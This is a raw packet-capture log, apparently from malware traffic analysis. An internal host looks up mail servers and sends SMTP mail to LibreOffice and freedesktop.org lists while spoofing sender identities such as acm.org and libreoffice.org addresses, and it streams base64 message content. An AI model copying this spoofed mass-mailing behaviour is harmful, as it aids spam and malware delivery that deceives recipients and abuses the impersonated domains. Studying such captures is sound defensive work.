….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:26.001128 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….u
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:26.062827 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
E..D…….t
..e
……5.0……………global.libreoffice.org…..
2019-07-15 13:00:26.126226 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
E..D…….s
..e
……5.09..d………..documentfoundation.org…..
2019-07-15 13:00:26.187392 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
E..=…….y
:
2019-07-15 13:00:30.460095 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 1:54, ack 1, win 64240, length 53: SMTP: 220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)
E..]…………
..e….]`.k…
P….h..220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:30.460605 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 1:15, ack 54, win 64187, length 14: SMTP: EHLO acm.org
E..6..@…..
..e………..
]`..P….T..EHLO acm.org

2019-07-15 13:00:30.460715 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 15, win 64240, length 0
E..(…………
..e….]......P....n.. 2019-07-15 13:00:30.541199 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [S.], seq 678655145, ack 2272612538, win 64240, options [mss 1460], length 0 E..,......y.Y.D. ..e....(st..uP.………..
2019-07-15 13:00:30.541436 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [.], ack 1, win 64240, length 0
E..(..@…A.
..eY.D……uP.(st.P….R..
2019-07-15 13:00:30.601674 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 54:197, ack 15, win 64240, length 143: SMTP: 250-gabe.freedesktop.org
E……….?….
..e….]`……P…%]..250-gabe.freedesktop.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:30.602630 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 15:43, ack 197, win 64044, length 28: SMTP: MAIL FROM:fdrake@acm.org
E..D..@…..
..e…………]`./P..,QQ..MAIL FROM:fdrake@acm.org

2019-07-15 13:00:30.602753 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 43, win 64240, length 0
E..(…………
..e….]./...4P....... 2019-07-15 13:00:30.735767 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 197:211, ack 43, win 64240, length 14: SMTP: 250 2.1.0 Ok E..6............ ..e....]./…4P…nf..250 2.1.0 Ok

2019-07-15 13:00:30.736105 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 43:88, ack 211, win 64030, length 45: SMTP: RCPT TO:libreoffice@lists.freedesktop.org
E..U..@…..
..e………..4]`.=P…….RCPT TO:libreoffice@lists.freedesktop.org

2019-07-15 13:00:30.736205 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 88, win 64240, length 0
E..(…………
..e….]`.=…aP…….
2019-07-15 13:00:31.087379 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 1:62, ack 1, win 64240, length 61: SMTP: 220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)
E..e……y.Y.D.
..e….(st..uP.P…….220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:31.087804 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 1:30, ack 62, win 64179, length 29: SMTP: EHLO global.libreoffice.org
E..E..@…A.
..eY.D……uP.(st.P….l..EHLO global.libreoffice.org

2019-07-15 13:00:31.087907 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 30, win 64240, length 0
E..(……y.Y.D.
..e….(st..uP.P…….
2019-07-15 13:00:31.270207 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 62:203, ack 30, win 64240, length 141: SMTP: 250-vm194.documentfoundation.org
E………y9Y.D.
..e….(st..uP.P…….250-vm194.documentfoundation.org
250-PIPELINING
250-SIZE 41943040
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:31.271261 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 30:77, ack 203, win 64038, length 47: SMTP: MAIL FROM:postmaster@global.libreoffice.org
E..W..@…A.
..eY.D……uP.(sutP..&….MAIL FROM:postmaster@global.libreoffice.org

2019-07-15 13:00:31.271380 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 77, win 64240, length 0
E..(……y.Y.D.
..e….(sut.uQ.P….<.. 2019-07-15 13:00:31.481963 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 203:217, ack 77, win 64240, length 14: SMTP: 250 2.1.0 Ok
E..6……y.Y.D.
..e….(sut.uQ.P…s…250 2.1.0 Ok

2019-07-15 13:00:31.482279 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 77:121, ack 217, win 64024, length 44: SMTP: RCPT TO:marketing@global.libreoffice.org
E..T..@…A.
..eY.D……uQ.(su.P….2..RCPT TO:marketing@global.libreoffice.org

2019-07-15 13:00:31.482382 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 121, win 64240, length 0
E..(……y.Y.D.
..e….(su..uQ2P…….
2019-07-15 13:00:31.686040 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 217:291, ack 121, win 64240, length 74: SMTP: 450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
E..r……yxY.D.
..e….(su..uQ2P….e..450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
2019-07-15 13:01:10.499434 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15417, win 64240, length 0
E..(……48.F(g
..e…;….D…P…]…
2019-07-15 13:01:10.499471 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15417:15490, ack 277, win 63964, length 73: SMTP: CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P
E..q.*@….C
..e.F(g.;..D…….P…….CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P

2019-07-15 13:01:10.499509 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15490, win 64240, length 0
E..(……47.F(g
..e…;….D..5P…]z..
2019-07-15 13:01:10.499581 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15490:15568, ack 277, win 63964, length 78: SMTP: E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9
E..v.+@….=
..e.F(g.;..D..5….P…FB..E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9

2019-07-15 13:01:10.499614 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15568, win 64240, length 0
E..(……46.F(g
..e…;….D…P…],..
2019-07-15 13:01:10.499657 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15568:15646, ack 277, win 63964, length 78: SMTP: VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo
E..v.,@….<
..e.F(g.;..D…….P….*..VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo

2019-07-15 13:01:10.499691 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15646, win 64240, length 0
E..(……45.F(g
..e…;….D…P……
2019-07-15 13:01:10.499734 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15646:15724, ack 277, win 63964, length 78: SMTP: ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb
E..v.-@….;
..e.F(g.;..D…….P….O..ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb

2019-07-15 13:01:10.499767 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15724, win 64240, length 0
E..(……44.F(g
..e…;….D…P……
2019-07-15 13:01:10.499810 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15724:15803, ack 277, win 63964, length 79: SMTP: 2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D
E..w..@….9
..e.F(g.;..D…….P…l…2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D

2019-07-15 13:01:10.499843 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15803, win 64240, length 0
E..(……43.F(g
..e…;….D..nP…\A..
2019-07-15 13:01:10.499885 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15803:15852, ack 277, win 63964, length 49: SMTP: Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY
E..Y./@….V
..e.F(g.;..D..n….P…….Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY

2019-07-15 13:01:10.499919 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15852, win 64240, length 0
E..(……42.F(g
..e…;….D…P……
2019-07-15 13:01:10.499962 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15852:15874, ack 277, win 63964, length 22: SMTP: WwwouqTVQl4axZk+9NR8
E..>.0@….p
..e.F(g.;..D…….P….s..WwwouqTVQl4axZk+9NR8

2019-07-15 13:01:10.499995 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15874, win 64240, length 0
E..(……41.F(g
..e…;….D…P…[…
2019-07-15 13:01:10.500037 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15874:15886, ack 277, win 63964, length 12: SMTP: fFly N+umw
E..4.1@….y
..e.F(g.;..D…….P…….fFly N+umw